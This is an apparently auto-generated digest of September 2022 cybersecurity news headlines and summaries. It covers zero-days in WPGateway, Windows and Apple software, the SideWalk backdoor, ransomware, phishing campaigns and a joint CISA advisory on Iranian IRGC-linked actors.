                A zero-day flaw in the latest version of a WordPress premium plugin known as WPGateway is being actively exploited in the wild, potentially allowing malicious actors to completely take over affected sites. Tracked as CVE-2022-3180 (CVSS score: 9.8), the issue is being weaponized to add a malicious administrator user to sites running the WPGateway plugin, WordPress security company Wordfence



                Researchers Detail OriginLogger RAT — Successor to Agent Tesla Malware

                exploits
                2022-09-14 https://thehackernews.com/2022/09/researchers-detail-originlogger-rat.html
                Palo Alto Networks Unit 42 has detailed the inner workings of a malware called OriginLogger, which has been touted as a successor to the widely used information stealer and remote access trojan (RAT) known as Agent Tesla. A .NET based keylogger and remote access, Agent Tesla has had a long-standing presence in the threat landscape, allowing malicious actors to gain remote access to targeted

                Autosummary: The executable is a builder binary that allows a purchased customer to specify the kinds of data to be captured, including clipboard, screenshots, and the list of applications and services (e.g., browsers, email clients etc.) from which the credentials are to be extracted.


                Microsoft's Latest Security Update Fixes 64 New Flaws, Including a Zero-Day

                exploits
                2022-09-14 https://thehackernews.com/2022/09/microsofts-latest-security-update-fixes.html
                Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks. Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its

                Autosummary: Windows TCP/IP Remote Code Execution Vulnerability; CVE-2022-34721 (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability; CVE-2022-34722 (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability; CVE-2022-34700 (CVSS score: 8.8) - Microsoft Dynamics 365 (on-premises)


                Threat actors are actively exploiting a zero-day in WPGateway WordPress plugin

                exploits
                2022-09-14 https://securityaffairs.co/wordpress/135715/cyber-crime/wordpress-wpgateway-critical-flaw.html

                Threat actors are actively exploiting a zero-day vulnerability in the WPGateway premium plugin to target WordPress websites. The Wordfence Threat Intelligence team reported that threat actors are actively exploiting a zero-day vulnerability (CVE-2022-3180) in the WPGateway premium plugin in attacks aimed at WordPress sites. The WPGateway plugin is a premium plugin that allows users of […]

                The post Threat actors are actively exploiting a zero-day in WPGateway WordPress plugin appeared first on Security Affairs.



                Microsoft September 2022 Patch Tuesday fixed actively exploited zero-day

                exploits
                2022-09-14 https://securityaffairs.co/wordpress/135706/security/microsoft-patch-tuesday-sept-2022.html

                Microsoft released September 2022 Patch Tuesday security updates to address 64 flaws, including an actively exploited Windows zero-day. Microsoft September 2022 Patch Tuesday security updates address 64 vulnerabilities, including an actively exploited Windows zero-day. The flaws fixed by the IT giant impact Microsoft Windows and Windows Components; Azure and Azure Arc; .NET and Visual Studio […]

                The post Microsoft September 2022 Patch Tuesday fixed actively exploited zero-day appeared first on Security Affairs.



                Chinese state hackers create Linux variant for SideWalk backdoor

                government
                2022-09-14 https://www.bleepingcomputer.com/news/security/chinese-state-hackers-create-linux-variant-for-sidewalk-backdoor/
                State-backed Chinese hackers have developed a Linux variant for the SideWalk backdoor used against Windows systems belonging to targets in the academic sector. [...]

                Autosummary: On both Windows and Linux, the malware uses the same five threads, executed simultaneously, for specific tasks: [StageClient::ThreadNetworkReverse] - fetching proxy configurations for alternate connections to the command and control (C2) server; [StageClient::ThreadHeartDetect] - close connection to C2 server when commands are not received in the specified time; [StageClient::ThreadPollingDriven] - send heartbeat commands to C2 server if there is no info to deliver; [StageClient::ThreadBizMsgSend] - check for data to be sent in message queues for all other threads and process it; [StageClient::ThreadBizMsgHandler] - check for pending messages from the C2 server. ESET researchers also found that both Linux and Windows variants for SideWalk had the same payload delivered through the dead-drop resolver string hosted in a Google Docs file.


                Patch now! Microsoft issues critical security updates as PCs attacked through zero-day flaw

                exploits
                2022-09-14 https://www.bitdefender.com/blog/hotforsecurity/patch-now-microsoft-issues-critical-security-updates-as-pcs-attacked-through-zero-day-flaw/
                Windows users are once again being told to update their systems with the latest security patches from Microsoft, following the discovery of critical vulnerabilities - including ones which are already being exploited in the wild, or could be used to fuel a fast-spreading worm. Read more in my article on the Hot for Security blog.



                How to Do Malware Analysis?

                exploits
                2022-09-14 https://thehackernews.com/2022/09/how-to-do-malware-analysis.html
                According to the 2022 Malwarebytes Threat review, 40M Windows business computers' threats were detected in 2021. And malware analysis is necessary to combat and avoid this kind of attack. In this article, we will break down the goal of malicious programs' investigation and how to do malware analysis with a sandbox. What is malware analysis? Malware analysis is a process of studying a malicious

                Autosummary: Types of malware analysis: static and dynamic malware analysis. Key steps of malware analysis: across these five steps, the main focus of the investigation is to find out as much as possible about the malicious sample, the execution algorithm, and the way malware works in various scenarios. During your investigation, you can: get interactive access (work with the VM as on your personal computer: use a mouse, input data, reboot the system, and open files); screenshots, logs, string lines, excerpts, etc.; IOCs; review of the behavior activities like where it steals credentials from, if it modifies, drops, or installs files, reads values, and checks the language. For example, in the screenshot below, we can see the hashes, PE Header, mime type, and other information of the Formbook sample.


                CISA orders agencies to patch Windows, iOS bugs used in attacks

                exploits
                2022-09-14 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-windows-ios-bugs-used-in-attacks/
                CISA added two new vulnerabilities to its list of security bugs exploited in the wild today, including a Windows privilege escalation vulnerability and an arbitrary code execution flaw affecting iPhones and Macs. [...] "

                Autosummary: "


                US govt sanctions ten Iranians linked to ransomware attacks

                exploits ransomware
                2022-09-14 https://www.bleepingcomputer.com/news/security/us-govt-sanctions-ten-iranians-linked-to-ransomware-attacks/
                The Treasury Department's Office of Foreign Assets Control (OFAC) announced sanctions today against ten individuals and two entities affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks. [...] "

                Autosummary: The IRGC-affiliated group is comprised of employees and associates of Iran-based Najee Technology Hooshmand Fater LLC (Najee Technology) and Afkar System Yazd Company (Afkar System):
                • Mansour Ahmadi: the owner, managing director, and chairman of the board of Najee Technology
                • Ahmad Khatibi Aghda: managing director and member of the board of Afkar System
                • Additional employees and associates: Ali Agha-Ahmadi, Mohammad Agha Ahmadi, Mo'in Mahdavi, Aliakbar Rashidi-Barjini, Amir Hossein Nikaeen Ravari, Mostafa Haji Hosseini, Mojtaba Haji Hosseini, and Mohammad Shakeri-Ashtijeh. "


                Phishing page embeds keylogger to steal passwords as you type

                financial
                2022-09-14 https://www.bleepingcomputer.com/news/security/phishing-page-embeds-keylogger-to-steal-passwords-as-you-type/
                A novel phishing campaign is underway, targeting Greeks with phishing sites that mimic the state's official tax refund platform and steal credentials as they type them. [...] "

                Autosummary: Notice about tax return on the fake portal (Cyble). The emails contain links that point to multiple phishing URLs impersonating the Greek government tax portal, like “govgr-tax[.]me/ret/tax”, “govgreece-tax[.]me”, and “mygov-refund[.]me/ret/tax”. "


                Securing your IoT devices against cyber attacks in 5 steps

                industry
                2022-09-14 https://www.bleepingcomputer.com/news/security/securing-your-iot-devices-against-cyber-attacks-in-5-steps/
                How is IoT being used in the enterprise, and how can it be secured? We will demonstrate important security best practices and how a secure password policy is paramount to the security of devices. [...] "

                Autosummary: Today, modern IoT systems include a combination of the following:
                • Wireless networks – Wireless networks are the connectivity platform for IoT systems and enable IoT smart devices and sensors to be placed anywhere wireless networks can reach
                • Cloud or private data center database locations – Cloud or private data center database locations store the mass of information and telemetry data generated, captured, and communicated by the IoT device
                • Hardware sensors – Hardware sensors collect data from a wide range of systems depending on the device, the use case, and other aspects
                • Smart devices – Smart devices are traditionally "dumb" devices that perform various tasks but now have embedded intelligent sensors and the capability to connect to wireless networks for transmitting the data collected
                • Compute engines – Compute engines serve the purpose of analyzing and providing intelligent insights from the raw data collected from IoT devices and hardware sensors
                IoT security implications: While IoT is an amazingly powerful technology that organizations can benefit from, businesses do well to consider the security implications of IoT as they relate to their overall security posture. Businesses realize the benefits and value coming from IoT devices, including:
                • Businesses can improve productivity and efficiency with the insights gained from IoT-connected devices
                • Companies can collect data-driven insights to help make business decisions
                • It helps businesses realize the full potential of their revenue streams and develop new revenue models
                • It allows easily connecting the physical world with the digital world, which helps to drive innovation, agility, efficiency, and new understandings of data models
                • IoT devices work hand-in-hand with modern machine-learning algorithms, allowing the mass of collected data to be analyzed very quickly and businesses to extrapolate intelligent business insights.
                In general, IoT refers to devices with embedded software, sensors, network connectivity, and other technologies, allowing them to exchange data with other devices connected to the Internet. Internet of Things (IoT) devices are connecting the physical world with the digital. With the prevalence of broadband network connectivity, wireless networks, and now 5G mobile networks in remote locations, it is now possible to connect any device to the network, including IoT devices. "


                Chinese hackers create Linux version of the SideWalk Windows malware

                exploits
                2022-09-14 https://www.bleepingcomputer.com/news/security/chinese-hackers-create-linux-version-of-the-sidewalk-windows-malware/
                State-backed Chinese hackers have developed a Linux variant for the SideWalk backdoor used against Windows systems belonging to targets in the academic sector. [...] "

                Autosummary: On both Windows and Linux, the malware uses the same five threads, executed simultaneously, for specific tasks:
                • [StageClient::ThreadNetworkReverse] - fetching proxy configurations for alternate connections to the command and control (C2) server
                • [StageClient::ThreadHeartDetect] - close connection to C2 server when commands are not received in the specified time
                • [StageClient::ThreadPollingDriven] - send heartbeat commands to C2 server if there is no info to deliver
                • [StageClient::ThreadBizMsgSend] - check for data to be sent in message queues for all other threads and process it
                • [StageClient::ThreadBizMsgHandler] - check for pending messages from the C2 server
                ESET researchers also found that both Linux and Windows variants for SideWalk had the same payload delivered through the dead-drop resolver string hosted in a Google Docs file. "


                AA22-257A: Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations

                exploits
                2022-09-14 https://us-cert.cisa.gov/ncas/alerts/aa22-257a
                Original release date: September 14, 2022

                Summary

                Actions to take today to protect against ransom operations:

                • Keep systems and software updated and prioritize remediating known exploited vulnerabilities.
                • Enforce MFA.
                • Make offline backups of your data.

                This joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) - Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). Note: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as "the authoring agencies."

                This advisory updates joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.

                Since the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report

                Autosummary: "


                Lorenz Ransomware Exploit Mitel VoIP Systems to Breach Business Networks

                exploits ransomware
                2022-09-14 https://thehackernews.com/2022/09/lorenz-ransomware-exploit-mitel-voip.html
                The operators behind the Lorenz ransomware operation have been observed exploiting a now-patched critical security flaw in Mitel MiVoice Connect to obtain a foothold in target environments for follow-on malicious activities. "Initial malicious activity originated from a Mitel appliance sitting on the network perimeter," researchers from cybersecurity firm Arctic Wolf said in a report "

                Autosummary: "


                Death of Queen Elizabeth II exploited to steal Microsoft credentials

                exploits
                2022-09-14 https://www.bleepingcomputer.com/news/security/death-of-queen-elizabeth-ii-exploited-to-steal-microsoft-credentials/
                Threat actors are exploiting the death of Queen Elizabeth II in phishing attacks to lure their targets to malicious sites designed to steal their Microsoft account credentials. [...] "

                Autosummary: "


                New Lenovo BIOS updates fix security bugs in hundreds of models

                exploits
                2022-09-14 https://www.bleepingcomputer.com/news/security/new-lenovo-bios-updates-fix-security-bugs-in-hundreds-of-models/
                Chinese computer manufacturer Lenovo has issued a security advisory to warn its clients about several high-severity vulnerabilities impacting a wide range of products in the Desktop, All in One, Notebook, ThinkPad, ThinkServer, and ThinkStation lines. [...] "

                Autosummary: Chinese computer manufacturer Lenovo has issued a security advisory to warn of several high-severity BIOS vulnerabilities impacting hundreds of devices across its product lines (Desktop, All in One, IdeaCentre, Legion, ThinkCentre, ThinkPad, ThinkAgile, ThinkStation, ThinkSystem). "


                CISA added 2 more security flaws to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-09-14 https://securityaffairs.co/wordpress/135753/security/cisa-known-exploited-vulnerabilities-catalog-new-flaws.html

                CISA added more security flaws to its Known Exploited Vulnerabilities Catalog, including Windows and iOS flaws. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, a Windows privilege escalation vulnerability, tracked as CVE-2022-37969, and an arbitrary code execution issue, tracked as CVE-2022-32917, affecting iPhones and Macs. According to Binding […]

                The post CISA added 2 more security flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                5 technologies that help prevent cyberattacks for SMBs

                ciber
                2022-09-14 https://www.malwarebytes.com/blog/business/2022/09/5-technologies-that-help-prevent-cyber-attacks-for-smbs

                Categories: Business

                Cybercriminals are more likely to target small and medium-sized businesses for their perceived (and sometimes actual) lack of cyberdefenses. In this post, we break down five must-have technologies that help prevent cyberattacks for SMBs.

                (Read more...)

                The post 5 technologies that help prevent cyberattacks for SMBs  appeared first on Malwarebytes Labs.

                "

                Autosummary: Through a combination of web protection, application hardening, and more, EP provides businesses with full attack chain protection against both known and unknown malware, ransomware, and zero-hour threats. To that end, the following are strongly recommended: endpoint protection, VPN, DNS filtering, cloud storage scanning, and 2FA (and cyber insurance!). However, businesses use multiple different cloud storage repositories, and due to a lack of integration options, they are unable to get a centralized view of all of their scan results, across multiple repositories, in a single pane of glass. To better prevent cyberattacks, look for a cloud scanning service that uses multiple anti-malware engines, using a combination of signatures, heuristics and machine learning to increase detection rates. This article focuses on helping to prevent cyberattacks purely through technology; though of course, businesses need a combination of technology, people, and strategy to truly become cyber resilient. What's important to note here is that, because the risk level of every organization is different, there's no “one-size-fits-all” approach to prevent cyberattacks. "


                Update now! Microsoft patches two zero-days

                exploits
                2022-09-14 https://www.malwarebytes.com/blog/news/2022/09/update-now-microsoft-patches-two-zero-days

                Categories: News

                Tags: CVE-2022-37969

                Tags: CVE-2022-23960

                Tags: CVE-2022-35805

                Tags: CVE-2022-34700

                Tags: CVE-2022-34718

                Tags: CVE-2022-34721

                Tags: CVE-2022-34722

                Tags: Microsoft

                Tags: Adobe

                Tags: Android

                Tags: Apple

                Tags: Cisco

                Tags: Google

                Tags: Samsung

                Tags: SAP

                Tags: VMWare

                The September 2022 Patch Tuesday updates include two zero-day vulnerabilities, one of which is known to be used in attacks

                (Read more...)

                The post Update now! Microsoft patches two zero-days appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: September 14, 2022. The Microsoft September 2022 Patch Tuesday includes fixes for two publicly disclosed zero-day vulnerabilities, one of which is known to be actively exploited. Zero-days: The first zero-day, CVE-2022-37969, is a Windows Common Log File System Driver Elevation of Privilege (EoP) vulnerability. "


                WPGateway WordPress plugin vulnerability could allow full site takeover

                exploits
                2022-09-14 https://www.malwarebytes.com/blog/news/2022/09/wpgateway-wordpress-plugin-vulnerability-could-allow-full-site-takeover

                Categories: News

                Tags: WPGateway

                Tags: WordPress

                Tags: plugin

                Tags: vulnerability

                Tags: CVE

                We take a look at a vulnerability being exploited in the wild related to the WPGateway WordPress plugin.

                (Read more...)

                The post WPGateway WordPress plugin vulnerability could allow full site takeover appeared first on Malwarebytes Labs.

                "

                Autosummary: Detecting and avoiding compromise: options are limited, but for now the main advice from Wordfence is this: remove the plugin installation until a patch is made available. "


                Forescout and First Health Advisory partner to help organizations mitigate IT, IoT, OT, and IoMT risks

                industry
                2022-09-14 https://www.helpnetsecurity.com/2022/09/15/forescout-first-health-advisory/

                The Forescout Technologies and First Health Advisory partnership creates an approach to connected asset risk management by automating the technical data collection, mitigation and risk reduction measures for a healthcare organization’s entire network, encompassing IT, IoT, OT, and IoMT assets. Healthcare organizations’ networks are under constant attack and often do not have the necessary human capital to oversee the work necessary to thwart a potential threat or attack through quick response. This challenge places added … More

                The post Forescout and First Health Advisory partner to help organizations mitigate IT, IoT, OT, and IoMT risks appeared first on Help Net Security.

                "

                Autosummary: "


                Gay hookup site typosquatted to push dodgy Chrome extensions, scams

                financial
                2022-09-14 https://www.bleepingcomputer.com/news/security/gay-hookup-site-typosquatted-to-push-dodgy-chrome-extensions-scams/
                Gay hookup and cruising web app Sniffies is being impersonated by opportunistic threat actors hoping to target the website's users with many typosquatting domains that push scams and dubious Google Chrome extensions. In some cases, these illicit domains launch the Apple Music app prompting users to buy a subscription. [...] "

                Autosummary: Once accessed, the illicit "Sniffies" copycat domains do one of the following things:
                • Push the user to install dubious Chrome extensions
                • Launch the "Music" App on Apple devices right from the web browser
                • Lead the users to bogus technical "support" scam sites
                • Lead the users to fake job posting sites
                In tests by BleepingComputer, one such typosquatting domain, sniiffies.com, for example, was seen performing one of the above tasks at random. "


                Malvertising on Microsoft Edge's News Feed pushes tech support scams

                financial
                2022-09-14 https://www.malwarebytes.com/blog/threat-intelligence/2022/09/microsoft-edges-news-feed-pushes-tech-support-scam

                We uncovered a campaign on the Microsoft Edge home page where malicious ads are luring victims into tech support scams.

                (Read more...)

                The post Malvertising on Microsoft Edge's News Feed pushes tech support scams appeared first on Malwarebytes Labs.

                "

                Autosummary: Infrastructure: The advertisements displayed on the Edge News Feed are linked with a list of domains (not exhaustive) given in the article. One of the domains, tissatweb[.]us, which was also publicly reported for hosting a browser locker, has interesting whois data: "


                How prepared are organizations to tackle ransomware attacks?

                exploits ransomware
                2022-09-13 https://www.helpnetsecurity.com/2022/09/13/ransomware-preparedness-priority/

                HYCU has announced its State of Ransomware Preparedness report in partnership with ActualTech Media, which reveals that ransomware is an unavoidable risk for businesses, which is why ransomware preparedness is a top priority. The report captures detailed data intended to help technology, financial and security leaders better prepare for and remediate ransomware attacks, which occur on average every 11 seconds and have risen to more than 236.1 million in the first half of 2022. “Survey … More

                The post How prepared are organizations to tackle ransomware attacks? appeared first on Help Net Security.

                "

                Autosummary: According to the report, 63% of surveyed enterprise organizations are increasing spending on detection, prevention and recovery, and respondents are beginning to understand that air-gapped or immutable backups are the only ways to ensure that the backups themselves don’t fall prey to encryption worms when ransomware hits. "


                Apple fixes actively exploited zero-day in macOS, iOS (CVE-2022-32917)

                exploits
                2022-09-13 https://www.helpnetsecurity.com/2022/09/13/cve-2022-32917/

                Apple has fixed a slew of vulnerabilities in macOS, iOS, and iPadOS, including a zero-day kernel vulnerability (CVE-2022-32917) exploited by attackers in the wild. About CVE-2022-32917: CVE-2022-32917, reported by an anonymous researcher, may allow a malicious application to execute arbitrary code with kernel privileges. “Apple is aware of a report that this issue may have been actively exploited,” the company said, and noted that the vulnerability has been remediated with improved bounds checks. The vulnerability … More

                The post Apple fixes actively exploited zero-day in macOS, iOS (CVE-2022-32917) appeared first on Help Net Security.

                "

                Autosummary: "


                A closer look at ransomware attack patterns

                exploits ransomware
                2022-09-13 https://www.helpnetsecurity.com/2022/09/13/ransomware-attack-patterns-video/

                Barracuda released its fourth-annual threat research report which looks at ransomware attack patterns that occurred between August 2021 and July 2022. This Help Net Security video highlights how ransomware attacks continue to be a threat to businesses of all sizes.

                The post A closer look at ransomware attack patterns appeared first on Help Net Security.

                "

                Autosummary: "


                Apple Releases iOS and macOS Updates to Patch Actively Exploited Zero-Day Flaw

                exploits
                2022-09-13 https://thehackernews.com/2022/09/apple-releases-ios-and-macos-updates-to.html
                Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild. The issue, assigned the identifier CVE-2022-32917, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges. "Apple is aware of a report that this issue may "

                Autosummary:
                • An application may be able to execute arbitrary code with kernel privileges
                • CVE-2022-32893 (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
                • CVE-2022-32894 (Kernel) - "


                Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel

                industry
                2022-09-13 https://securityaffairs.co/wordpress/135656/hacktivism/ghostsec-hacked-berghof-plcs-israel.html

                The hacktivist collective GhostSec claimed to have compromised 55 Berghof PLCs used by Israeli organizations. Pro-Palestinian hacking group GhostSec claimed to have compromised 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations as part of a Free Palestine campaign. On September 4th, 2022, GhostSec announced on social media and its Telegram channel that it had compromised […]

                The post Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel appeared first on Security Affairs.

                "

                Autosummary: In the message it published, GhostSec attached a video demonstrating a successful log-in to the PLC’s admin panel, together with an image of an HMI screen showing its current state and control of the PLC process, and another image showing that the PLC had been stopped. "


                U-Haul reports data breach, customers’ info exposed

                financial
                2022-09-13 https://www.helpnetsecurity.com/2022/09/13/u-haul-data-breach/

                U.S. moving and storage rental company U-Haul has suffered a data breach due to an unauthorized person having accessed an unspecified number of rental contracts, U-Haul’s parent company Amerco revealed last week. It is not known how many customers have been affected, but apparently their payment card information is safe – the person had access “only” to customers’ name, driver’s license (and the information included on it, e.g., physical address and date … More

                The post U-Haul reports data breach, customers’ info exposed appeared first on Help Net Security.

                "

                Autosummary: "


                Asian Governments and Organizations Targeted in Latest Cyber Espionage Attacks

                government
                2022-09-13 https://thehackernews.com/2022/09/asian-governments-and-organizations.html
                Government and state-owned organizations in a number of Asian countries have been targeted by a distinct group of espionage hackers as part of an intelligence gathering mission that has been underway since early 2021. "A notable feature of these attacks is that the attackers leveraged a wide range of legitimate software packages in order to load their malware payloads using a technique known as "

                Autosummary: The intrusion also made use of an 11-year-old version of Bitdefender Crash Handler ("javac.exe") to launch a renamed version of Mimikatz ("calc.exe"), an open source Golang penetration testing framework called LadonGo, and other custom payloads on multiple hosts. "


                Trend Micro warns of actively exploited Apex One RCE vulnerability

                exploits
                2022-09-13 https://www.bleepingcomputer.com/news/security/trend-micro-warns-of-actively-exploited-apex-one-rce-vulnerability/
                Security software firm Trend Micro warned customers today to patch an actively exploited Apex One security vulnerability as soon as possible. [...] "

                Autosummary: Authentication bypass bug also fixed today: Trend Micro addressed another high severity vulnerability in the Apex One product (CVE-2022-40144), allowing potential attackers to bypass authentication by falsifying request parameters on affected installations. "


                Cyberspies drop new infostealer malware on govt networks in Asia

                exploits
                2022-09-13 https://www.bleepingcomputer.com/news/security/cyberspies-drop-new-infostealer-malware-on-govt-networks-in-asia/
                Security researchers have identified new cyber-espionage activity focusing on government entities in Asia, as well as state-owned aerospace and defense firms, telecom companies, and IT organizations. [...] "

                Autosummary: The current campaign appears to be almost exclusively focused on government or public entities in Asia, including:
                • Head of government/Prime Minister's office
                • Government institutions linked to finance
                • Government-owned aerospace and defense companies
                • State-owned telecoms companies
                • State-owned IT organizations
                • State-owned media companies
                2022 attack chain: Symantec presents an example of an attack that unfolded in April 2022 to showcase how the espionage group compromises its government targets. "


                Trend Micro addresses actively exploited Apex One zero-day

                exploits
                2022-09-13 https://securityaffairs.co/wordpress/135689/security/trend-micro-apex-one-zero-day.html

                Trend Micro addressed multiple vulnerabilities in its Apex One endpoint security product, including actively exploited zero-day flaws. Trend Micro announced this week the release of security patches to address multiple vulnerabilities in its Apex One endpoint security product, including a zero-day vulnerability, tracked as CVE-2022-40139 (CVSS 3.0 SCORE 7.2), which is actively exploited. The CVE-2022-40139 […]

                The post Trend Micro addresses actively exploited Apex One zero-day appeared first on Security Affairs.

                "

                Autosummary: "


                Zero-day in WPGateway Wordpress plugin actively exploited in attacks

                exploits
                2022-09-13 https://www.bleepingcomputer.com/news/security/zero-day-in-wpgateway-wordpress-plugin-actively-exploited-in-attacks/
                The Wordfence Threat Intelligence team warned today that WordPress sites are being actively attacked through a zero-day vulnerability in the WPGateway premium plugin. [...] "

                Autosummary: "


                Microsoft September 2022 Patch Tuesday fixes zero-day used in attacks, 63 flaws

                exploits
                2022-09-13 https://www.bleepingcomputer.com/news/microsoft/microsoft-september-2022-patch-tuesday-fixes-zero-day-used-in-attacks-63-flaws/
                Today is Microsoft's September 2022 Patch Tuesday, and with it comes fixes for an actively exploited Windows vulnerability and a total of 63 flaws. [...] "

                Autosummary: "


                Microsoft fixes exploited zero-day in the Windows CLFS Driver (CVE-2022-37969)

                exploits
                2022-09-13 https://www.helpnetsecurity.com/2022/09/13/cve-2022-37969/

                September 2022 Patch Tuesday is here, with fixes for 64 CVE-numbered vulnerabilities in various Microsoft products, including one zero-day (CVE-2022-37969) exploited by attackers. About CVE-2022-37969: CVE-2022-37969 is an elevation of privilege vulnerability in the Windows Common Log File System (CLFS) Driver, and an attacker must already have access and the ability to run code on the target system (e.g., by exploiting another vulnerability or through social engineering) before trying to trigger it. “Post-exploitation flaws such … More

                The post Microsoft fixes exploited zero-day in the Windows CLFS Driver (CVE-2022-37969) appeared first on Help Net Security.

                "

                Autosummary: "


                Hackers now use ‘sock puppets’ for more realistic phishing attacks

                financial
                2022-09-13 https://www.bleepingcomputer.com/news/security/hackers-now-use-sock-puppets-for-more-realistic-phishing-attacks/
                An Iranian-aligned hacking group uses a new, elaborate phishing technique involving multiple personas and email accounts to lure targets into opening malicious documents. [...] "

                Autosummary: Timeline of the third MPI attack example (Proofpoint). In all cases, the threat actors used personal email addresses (Gmail, Outlook, AOL, Hotmail) for both the senders and the CCed persons instead of addresses from the impersonated institutions, which is a clear sign of suspicious activity. "


                Important update! iPhones, Macs, and more vulnerable to zero-day bug

                exploits
                2022-09-13 https://www.malwarebytes.com/blog/news/2022/09/update-now-apple-devices-are-exposed-to-a-new-zero-day-flaw

                Apple has patched an actively-exploited flaw that affects a host of devices and software, including iPhones, Macs, iPads, and iPod touch.

                The post Important update! iPhones, Macs, and more vulnerable to zero-day bug appeared first on Malwarebytes Labs.

                "

                Autosummary: "


                BackupBuddy WordPress plugin vulnerable to exploitation, update now!

                exploits
                2022-09-13 https://www.malwarebytes.com/blog/news/2022/09/backupbuddy-wordpress-plugin-vulnerable-to-exploitation-update-now

                We take a look at a vulnerability in popular WordPress plugin BackupBuddy, and the steps you need to take to fix it.

                The post BackupBuddy WordPress plugin vulnerable to exploitation, update now! appeared first on Malwarebytes Labs.

                "

                Autosummary: Hijacked sites can be used for SEO poisoning, redirecting to malicious sites, spam, malware installation, phishing, and more. "


                Financial organizations fail to act on firmware breaches

                financial
                2022-09-12 https://www.helpnetsecurity.com/2022/09/12/financial-organizations-fail-to-act-on-firmware-breaches-video/

                In this Help Net Security video, Michael Thelander, Director Product Marketing at Eclypsium, discusses how financial organizations are failing to act despite the majority experiencing a firmware-related breach. 92% of CISOs in finance believe adversaries are better equipped at weaponizing firmware than their teams are at securing it, according to Eclypsium and Vanson Bourne. Additionally, three out of four acknowledge gaps in awareness concerning the organization’s firmware blind spot. Consequently, 88% of those surveyed admit … More

                The post Financial organizations fail to act on firmware breaches appeared first on Help Net Security.

                "

                Autosummary: "


                MSPs and cybersecurity: The time for turning a blind eye is over

                ciber
                2022-09-12 https://www.helpnetsecurity.com/2022/09/12/msps-email-security/

                Results of a Vade report highlight the prevalence of Managed Service Providers (MSPs), with 96% of organizations either currently outsourcing at least some of their needs to MSPs or planning to do so in the future. The report also analyzes the successes and pitfalls of email security solutions and where MSPs may have an opportunity to reach into the market. Conducted by Vanson Bourne, the survey includes findings from interviews of 500 IT decision makers … More

                The post MSPs and cybersecurity: The time for turning a blind eye is over appeared first on Help Net Security.

                "

                Autosummary: Threat monitoring and intrusion (43%), cybersecurity consulting (37%) and firewall management (36%) are the three most important services to them. "


                Cisco confirms Yanluowang ransomware leaked stolen company data

                exploits ransomware
                2022-09-12 https://www.bleepingcomputer.com/news/security/cisco-confirms-yanluowang-ransomware-leaked-stolen-company-data/
                Cisco has confirmed that the data leaked yesterday by the Yanluowang ransomware gang was stolen from the company network during a cyberattack in May. [...] "

                Autosummary: "


                Outdated infrastructure remains a problem against sophisticated cyberattacks

                ciber
                2022-09-12 https://www.helpnetsecurity.com/2022/09/12/outdated-infrastructure-video/

                Global research commissioned by Cohesity reveals that nearly half of respondents say their company depends on outdated, legacy backup and recovery infrastructure to manage and protect their data. This Help Net Security video shows that organizations are still relying on outdated infrastructure to protect their data.

                The post Outdated infrastructure remains a problem against sophisticated cyberattacks appeared first on Help Net Security.

                "

                Autosummary: "


                Building a successful cybersecurity business, one client at a time

                ciber
                2022-09-12 https://www.helpnetsecurity.com/2022/09/12/cloudsek-building-a-successful-cybersecurity-business/

                Rahul Sasi is the founder and CEO of CloudSEK, which leverages artificial intelligence and machine learning to combat cyber threats. The Singapore-headquartered company was founded in 2015, and raised $7 million in Series A investment led by MassMutual Ventures in 2021. In this Help Net Security interview, Sasi talks about the challenges of building CloudSEK, his journey in the cybersecurity industry, and discusses lessons learned along the way. What unexpected obstacles did you encounter … More

                The post Building a successful cybersecurity business, one client at a time appeared first on Help Net Security.

                "

                Autosummary: So, as long as we ensure that all CloudSters are growing and experimenting at a good pace, CloudSEK will continue to grow. “If you want to go fast, go alone; if you want to go far, go together.” It is also important to nurture and cultivate a culture that fosters consistency, innovation, and experimentation. "


                Some firmware bugs in HP business devices are yet to be fixed

                exploits
                2022-09-12 https://securityaffairs.co/wordpress/135592/security/firmware-bugs-hp-devices.html

                Six high-severity firmware bugs affecting several HP Enterprise devices are yet to be patched, some of them since July 2021. The Binarly security research team reported several HP Enterprise devices are affected by six high-severity firmware vulnerabilities that are yet to be patched, and some of them have been disclosed more than a year ago. […]

                The post Some firmware bugs in HP business devices are yet to be fixed appeared first on Security Affairs.

